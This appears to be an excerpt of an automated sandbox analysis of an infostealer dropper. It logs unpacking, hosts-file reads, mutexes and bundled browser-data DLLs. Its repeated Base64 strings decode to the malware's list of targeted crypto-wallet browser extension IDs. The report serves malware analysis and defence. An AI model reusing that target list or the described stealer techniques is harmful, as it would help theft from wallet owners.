Source: namdoitntn.exe.1.dr, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: jshainx.exe.1.dr, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 26.0.namdoitntn.exe.2f0000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 31.0.jshainx.exe.3e0000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Mutant created: \Sessions\1\BaseNamedObjects\iqroq5112542785672901323
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8764:120:WilError_01

Source: SETUP_~1.EXE.34.dr, u0010/u0010.cs

Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Automated click: OK
Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	Automated click: OK

Source: C:\Users\user\Desktop\WSkT8d093C.exe

File opened: C:\Windows\SysWOW64\msftedit.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source: WSkT8d093C.exe

Static file information: File size 2772338 > 1048576

Source:	Binary string: softokn3.pdbp source: softokn3.dll.20.dr
Source:	Binary string: wextract.pdb source: captain09876.exe, 00000022.00000002.790134700.00007FF786FD9000.00000002.00000001.01000000.00000011.sdmp, captain09876.exe, 00000022.00000000.361959135.00007FF786FD9000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: wextract.pdbGCTL source: captain09876.exe, 00000022.00000002.790134700.00007FF786FD9000.00000002.00000001.01000000.00000011.sdmp, captain09876.exe, 00000022.00000000.361959135.00007FF786FD9000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\wiroguzaxun\lefereyocimuwu-fep\22\wipo\57_so.pdb source: F0geI.exe, 00000014.00000000.319863933.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: softokn3.pdb source: softokn3.dll.20.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Unpacked PE file: 20.2.F0geI.exe.400000.0.unpack
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Unpacked PE file: 23.2.kukurzka9000.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Unpacked PE file: 20.2.F0geI.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Unpacked PE file: 23.2.kukurzka9000.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

.NET source code contains potential unpacker

Source: SETUP_~1.EXE.34.dr, u0010/u0010.cs

.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\WSkT8d093C.exe	Code function: 1_3_03AB3F61 push ss; ret	1_3_03AB3F62
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Code function: 1_3_03AB422D push FFFFFFB7h; retf	1_3_03AB422F
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Code function: 1_3_03AB6059 push ecx; ret	1_3_03AB606C
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_022BEFE0 push edx; ret	23_2_022BF158
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_022BEE90 push edx; ret	23_2_022BEE9B

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 20_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,

20_2_00408ADD

Source: ffnameedit.exe.1.dr

Static PE information: 0xC02D666A [Thu Mar 3 03:20:10 2072 UTC]

Source: nss3.dll.20.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.20.dr	Static PE information: section name: .didat
Source: mozglue.dll.20.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.20.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.20.dr	Static PE information: section name: .00cfg
Source: sqlite3.dll.20.dr	Static PE information: section name: /4
Source: sqlite3.dll.20.dr	Static PE information: section name: /19
Source: sqlite3.dll.20.dr	Static PE information: section name: /31
Source: sqlite3.dll.20.dr	Static PE information: section name: /45
Source: sqlite3.dll.20.dr	Static PE information: section name: /57
Source: sqlite3.dll.20.dr	Static PE information: section name: /70
Source: sqlite3.dll.20.dr	Static PE information: section name: /81
Source: sqlite3.dll.20.dr	Static PE information: section name: /92

Source: ffnameedit.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x27f85
Source: WW1.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4db20
Source: namdoitntn.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x1ad86
Source: real.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x5422a
Source: jshainx.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x1d394
